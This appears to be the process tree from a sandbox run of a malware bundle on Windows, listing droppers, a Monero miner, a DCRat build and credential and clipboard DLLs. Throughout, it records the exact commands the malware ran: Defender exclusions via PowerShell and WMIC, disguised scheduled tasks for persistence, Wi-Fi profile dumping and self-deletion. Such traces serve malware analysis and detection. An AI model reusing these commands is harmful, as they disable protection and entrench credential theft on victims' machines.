- C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
  2⤵
  PID:6568
- C:\Users\Admin\AppData\Local\Temp\Files\net.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
  2⤵
  PID:2904
- C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe"
  2⤵
  PID:3524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'build6_unencrypted.exe'
    3⤵
    PID:6956
- C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
  2⤵
  PID:7612
- C:\Users\Admin\AppData\Local\Temp\Files\hghgfhjfhmain.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hghgfhjfhmain.exe"
  2⤵
  PID:8844
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:8952
- C:\Users\Admin\AppData\Local\Temp\Files\VLTKTanthuTN.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VLTKTanthuTN.exe"
  2⤵
  PID:6128
- C:\Users\Admin\AppData\Local\Temp\Files\current.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\current.exe"
  2⤵
  PID:6488
- C:\Users\Admin\AppData\Local\Temp\Files\555.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\555.exe"
  2⤵
  PID:2968
- C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"
  2⤵
  PID:6820
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c net use
    3⤵
    PID:5568
  - - C:\Users\Admin\AppData\Local\Temp\Files\net.exe
      net use
      4⤵
      PID:8828
- C:\Users\Admin\AppData\Local\Temp\Files\fullwork.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fullwork.exe"
  2⤵
  PID:7764
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6208
- C:\Users\Admin\AppData\Local\Temp\Files\poolsdnkjfdbndklsnfgb.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\poolsdnkjfdbndklsnfgb.exe"
  2⤵
  PID:6584
- C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  PID:5720
- C:\Users\Admin\AppData\Local\Temp\Files\Mtkfarukc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Mtkfarukc.exe"
  2⤵
  PID:8468
- C:\Users\Admin\AppData\Local\Temp\Files\RDX.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\RDX.exe"
  2⤵
  PID:6560
- C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe"
  2⤵
  PID:2400
- C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"
  2⤵
  PID:8168
- C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe"
  2⤵
  PID:7816
- C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe"
  2⤵
  PID:8956
- C:\Users\Admin\AppData\Local\Temp\Files\Nvokcuobkn.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Nvokcuobkn.exe"
  2⤵
  PID:2200
- C:\Users\Admin\AppData\Local\Temp\Files\Fullwork123.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Fullwork123.exe"
  2⤵
  PID:6556
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1456
- C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe"
  2⤵
  PID:7236
- C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
  2⤵
  - Launches sc.exe
  PID:2068
- C:\Users\Admin\AppData\Local\Temp\Files\chckik.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\chckik.exe"
  2⤵
  PID:5060
- C:\Users\Admin\AppData\Local\Temp\Files\Setup2010u32.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Setup2010u32.exe"
  2⤵
  PID:6648
- C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe"
  2⤵
  PID:5128
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7276
- C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"
  2⤵
  PID:7868
- C:\Users\Admin\AppData\Local\Temp\Files\Akh.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Akh.exe"
  2⤵
  PID:4848
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
    3⤵
    PID:2536
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    3⤵
    PID:6420
- C:\Users\Admin\AppData\Local\Temp\Files\diufhloadme.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\diufhloadme.exe"
  2⤵
  PID:6976
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    3⤵
    PID:2880
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
    3⤵
    PID:7296
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    PID:5980
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
      4⤵
      Creates scheduled task(s)
      PID:7288
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\Files\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
    3⤵
    PID:3604
- C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe"
  2⤵
  PID:8900
- C:\Users\Admin\AppData\Local\Temp\Files\random.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
  2⤵
  PID:768
- C:\Users\Admin\AppData\Local\Temp\Files\EchoNavigator.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\EchoNavigator.exe"
  2⤵
  PID:3948
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -nologo -noprofile -noninteractive -executionpolicy bypass -command .\serverBrowser.ps1
    3⤵
    PID:6812
- C:\Users\Admin\AppData\Local\Temp\Files\Cvdnacb.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Cvdnacb.exe"
  2⤵
  PID:9064
- C:\Users\Admin\AppData\Local\Temp\Files\pt.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pt.exe"
  2⤵
  PID:1648
- - C:\Windows\system32\cmd.exe
    "cmd" /C tasklist
    3⤵
    PID:7360
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3852
- C:\Users\Admin\AppData\Local\Temp\Files\AppGate2103v01.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\AppGate2103v01.exe"
  2⤵
  PID:3156
- C:\Users\Admin\AppData\Local\Temp\Files\juditttt.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\juditttt.exe"
  2⤵
  PID:4920
- - C:\Users\Admin\AppData\Local\Temp\onefile_4920_133571333056575945\stub.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\juditttt.exe"
    3⤵
    PID:8916
- C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f00076.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f00076.exe"
  2⤵
  PID:2484
- C:\Users\Admin\AppData\Local\Temp\Files\dais123.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dais123.exe"
  2⤵
  PID:1848
- C:\Users\Admin\AppData\Local\Temp\Files\Retailer_prog.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Retailer_prog.exe"
  2⤵
  PID:1576

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2692

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:3560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Media Player\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 6 /tr "'C:\Windows\security\cap\chrome.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chrome" /sc ONLOGON /tr "'C:\Windows\security\cap\chrome.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 10 /tr "'C:\Windows\security\cap\chrome.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1128

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
PID:5032
- C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe
  "C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe"
  2⤵
  PID:6676
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6768
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5572
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6816
  - - C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
      4⤵
      PID:6932
  - - C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
      4⤵
      PID:6956
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
      4⤵
      PID:5196
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:6336
- C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
  "C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
  2⤵
  PID:6164
- C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe
  "C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"
  2⤵
  PID:3364
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5448
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5836
- C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
  "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe"
  2⤵
  PID:6352
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:6692
- C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe"
  2⤵
  PID:6524
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6012
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6524 -s 800
    3⤵
    - Program crash
    PID:5312
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
  2⤵
  PID:6680
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
    3⤵
    PID:6796
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:7128
- C:\Users\Admin\AppData\Local\Temp\1001078001\koooooo.exe
  "C:\Users\Admin\AppData\Local\Temp\1001078001\koooooo.exe"
  2⤵
  PID:5496
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5956
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 784
    3⤵
    - Program crash
    PID:6900
- C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
  "C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe"
  2⤵
  PID:2736
- C:\Users\Admin\AppData\Local\Temp\1001084001\random.exe
  "C:\Users\Admin\AppData\Local\Temp\1001084001\random.exe"
  2⤵
  PID:5000
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
  2⤵
  PID:5708
- C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe
  "C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe"
  2⤵
  PID:2852
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
    3⤵
    PID:6820
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    PID:2192
  - - C:\Users\Admin\Pictures\haJbG9FpGg6AUJ9ALQ9VyGHI.exe
      "C:\Users\Admin\Pictures\haJbG9FpGg6AUJ9ALQ9VyGHI.exe"
      4⤵
      PID:6348
  - - C:\Users\Admin\Pictures\UooU08WzN4vIB832ype3jXB0.exe
      "C:\Users\Admin\Pictures\UooU08WzN4vIB832ype3jXB0.exe"
      4⤵
      PID:1904
    - - C:\Users\Admin\AppData\Local\Temp\7zSACA1.tmp\Install.exe
        
        .\Install.exe /dQndidvBp "385118" /S
        5⤵
        
        PID:5064
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:8304
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:8308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:4628
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        
        PID:9172
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 10:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe\" mP /IEsite_idSMA 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:9052
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bgNHpsssZstYPMxCCI"
        6⤵
        
        PID:3856
  - - C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe
      "C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe" --silent --allusers=0
      4⤵
      PID:3528
    - - C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe
        
        C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x6a56e1d0,0x6a56e1dc,0x6a56e1e8
        5⤵
        
        PID:7928
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\umPlEK4aziY8EEGcrfHzzB0q.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\umPlEK4aziY8EEGcrfHzzB0q.exe" --version
        5⤵
        
        PID:7796
    - - C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe
        
        "C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3528 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240409103325" --session-guid=0abe6b48-da5d-4bec-969b-1f0a82badb78 --server-tracking-blob="MGJmYTVkMGJlZWUwZjY4NDBjYzkzZmQwYzkyMWVlYWRkZmI2NzJmYWRhMjRjNWNkYTJiZTY5NDVlODc1NWEzMjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEyNjU4NzgzLjY4MDYiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYjY0NzZkZWMtNjMzMC00MTlmLWI1NDgtMDQ5MDlkZTg0N2I1In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C04000000000000
        5⤵
        
        PID:3400
      - C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe
        
        C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2ac,0x2b0,0x2b4,0x27c,0x2b8,0x698de1d0,0x698de1dc,0x698de1e8
        6⤵
        
        PID:6968
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
        5⤵
        
        PID:9004
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\assistant_installer.exe" --version
        5⤵
        
        PID:6952
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xb80040,0xb8004c,0xb80058
        6⤵
        
        PID:6868
  - - C:\Users\Admin\Pictures\jCZs626MNMXVHotE1cLv75ff.exe
      "C:\Users\Admin\Pictures\jCZs626MNMXVHotE1cLv75ff.exe"
      4⤵
      PID:5200
    - - C:\Users\Admin\AppData\Local\Temp\7zSAEB5.tmp\Install.exe
        
        .\Install.exe /dQndidvBp "385118" /S
        5⤵
        
        PID:7944
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:8612
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5072
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        
        PID:8080
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 10:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe\" mP /IEsite_idSMA 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:5504
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bgNHpsssZstYPMxCCI"
        6⤵
        
        PID:7180
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "eMHQCETsWPnVYjMqf" /SC once /ST 05:57:28 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\GlgcQoiPCSwQOyx\FzRWhuL.exe\" fx /MMsite_idmOX 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:2220
  - - C:\Users\Admin\Pictures\tbgIZBm1nG4rugHFew3oeeyZ.exe
      "C:\Users\Admin\Pictures\tbgIZBm1nG4rugHFew3oeeyZ.exe"
      4⤵
      PID:6884
  - - C:\Users\Admin\Pictures\GJPsrDlzzfkLrin4VhPrJPgr.exe
      "C:\Users\Admin\Pictures\GJPsrDlzzfkLrin4VhPrJPgr.exe"
      4⤵
      PID:3300
    - - C:\Users\Admin\AppData\Local\Temp\u2jo.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2jo.0.exe"
        5⤵
        
        PID:1376
    - - C:\Users\Admin\AppData\Local\Temp\u2jo.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u2jo.1.exe"
        5⤵
        
        PID:7360
  - - C:\Users\Admin\Pictures\wqrKyeRNaNr3JIm7s872hUX2.exe
      "C:\Users\Admin\Pictures\wqrKyeRNaNr3JIm7s872hUX2.exe"
      4⤵
      PID:1464
  - - C:\Users\Admin\Pictures\hODpRzFYkj7FPnnkbvEi4nOL.exe
      "C:\Users\Admin\Pictures\hODpRzFYkj7FPnnkbvEi4nOL.exe"
      4⤵
      PID:6176
  - - C:\Users\Admin\Pictures\jcQNl4xPAYx8rgrl7pVAVz6t.exe
      "C:\Users\Admin\Pictures\jcQNl4xPAYx8rgrl7pVAVz6t.exe"
      4⤵
      PID:6852
